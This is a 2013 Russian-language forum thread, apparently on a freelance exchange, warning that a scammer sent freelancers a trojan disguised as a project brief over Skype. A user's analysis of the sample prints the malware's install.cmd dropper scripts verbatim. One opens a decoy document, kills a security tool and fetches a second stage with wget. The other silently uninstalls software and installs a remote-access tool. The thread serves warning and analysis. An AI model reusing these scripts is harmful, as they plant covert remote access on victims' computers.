Осторожно! Вирусы в Skype
158 повідомлень
#11 років тому
Добрый день.Добавился сегодня человек skype: stomat1980 якобы по проекту с веблансера,я попросил ссылку на что он ответил,зачем Вам?И скинул ТЗ архив с файлом .exe.Будьте аккуратны,это развод.
3918 повідомлень
#11 років тому
lagutin, пожалуйста, сообщите дату и время обращения мошенника.
158 повідомлень
#11 років тому
16.10.2013 ,примерное время 15-30 по Киеву.Я просто удалил его сразу из скайпа.Имя скайп "..." даже нет имени.
828 повідомлень
#11 років тому
lagutin, К нам тоже обратились сегодня, формат .scr, модифицированный троян. Сейчас выясняем внутреннее содержимое с целью получения адресов куда и кому программа должна отправлять какие то данные.Обращение в 16:07 по МСК
158 повідомлень
#11 років тому
PerfectoWeb, Я не стал открывать даже,от греха подальше как говорится...
3918 повідомлень
#11 років тому
Аккаунт мошенника обнаружен и блокирован.Мошенник мог отправлять вирус также следующим пользователям:
bezlepkina, PerfectoWeb, LGPgroup, san-francisco, art_Alex_Z, FanDes, AndriyPro, sozidai, AlexKantegro, WebMatrix, TOPSECRET, colorit_design, Mochulskiy, creative_dima.
Пожалуйста, будьте внимательны.
828 повідомлень
#11 років тому
lagutin, Да открывать "естественным путем" не стоит ) Особенно под Win OSWeblancer, Спасибо!
6863 повідомлення
#11 років тому
Вот интересно, после этого еще будут недовольные кнопочкой "показать контакты"?
828 повідомлень
#11 років тому

Кому интересно, это модифицированный 7z архив, внутри:
Содержимое DOC119.docx - обычный документ, который открывается после запуска визуально
Содержимое install.cmd
@echo off
start DOC119.docx
@taskkill /f /im anvir.exe
@wget.exe посилання
start Adobe.Flash.Player.20.0.scr
Сайт разработан на Joomla )
3543 повідомлення
#11 років тому
floppox, Елена, так если бы только в кнопке дело было.Спасибо сервису за безопасность, но у многих аккаунты на других биржах, свои сайты и везде контакты открыты.
Так что конкретная фишка эффективна от недалеких мошенников «работающих» здесь. Но и за это спасибо, конечно.
828 повідомлень
#11 років тому

Скачиваем файл по ссылке Adobe.Flash.Player.20.0.scr, который должен был скачать предыдущий пакет после запуска.
Тоже самое, 7z архив переименованный в .scr
Содержимое архива на скрине.
Содержимое файла install.cmd
@chcp 1251
if exist "%ProgramFiles%\Common Files\rfusclient.exe" goto 1
goto end
:1
exit
:end
mkdir "%ProgramFiles%\Common Files"
copy winmm.dll "%ProgramFiles%\Common Files" >nul
if exist "%ProgramFiles%\Common Files\winmm.dll" goto end2
exit
:end2
@MsiExec /x {61FFA475-24D5-44FB-A51F-39B699E3D82C} /qn REBOOT=ReallySuppress
@MsiExec /x {54067864-C0E7-47DB-A0C1-D6C874CE6BD8} /qn REBOOT=ReallySuppress
@ping 127.0.0.1
@MsiExec /I "system32.msi" /qn
3543 повідомлення
#11 років тому
PerfectoWeb, вы клевые. А для особо одаренных, что этот вирус делает, какое зло причиняет?
828 повідомлень
#11 років тому

Содержимое system32.msi
Summer_Rain, Пока не знаю Александр, вот хочу найти какие то электронные адреса или что то другое полезное. Он скорее всего крадет какие-то важные(финансовые) данные и отправляет кому то, или же заражает PC для других целей
828 повідомлень
#11 років тому
В некоторых файлах нашлись следующие данные:Сайт: rmansys . ru файлы которого скрипт устанавливает похоже.
Устанавливает драйвер setupdrv.exe
uvnc . com/features/driver.html
Устанавливает (потом запускает) файл srvinst.exe - ru.systemexplorer . net/file-database/file/srvinst-exe
VALUE "CompanyName", "TektonIT"
VALUE "FileDescription", "RMS unit"
VALUE "FileVersion", "5.5.0.0"
VALUE "LegalCopyright", "Copyright © 2013 TektonIT. All rights reserved."
VALUE "LegalTrademarks", "TektonIT, Remote Manipulator System"
VALUE "ProductName", "Remote Manipulator System"
VALUE "ProductVersion", "5.5.0.0"
VALUE "Comments", "Remote Manipulator System unit"
------------------------------
По моим предположения уже ясно, что устанавливает программу для удаленного доступа. Ну а там уже сами зайдут в режиме file manager и будут искать полезную информацию.
3543 повідомлення
#11 років тому
Всегда завораживала тема вирусов, как говорят, такую силу да в мирных целях.Давид, спасибо за дополнительную информацию.
828 повідомлень
#11 років тому
Summer_Rain, Да пожалуйста)
828 повідомлень
#11 років тому
frig, Так нормально?
16382 повідомлення
#11 років тому
PerfectoWeb, вроде норм. А то мало ли что на этих сайтах может быть. Еще зайдет кто-то по ссылке.
828 повідомлень
#11 років тому
frig, Верно. Ну я на всякий случай уведомил владельца того сайта (если он не соучастник), что там вирусный файл.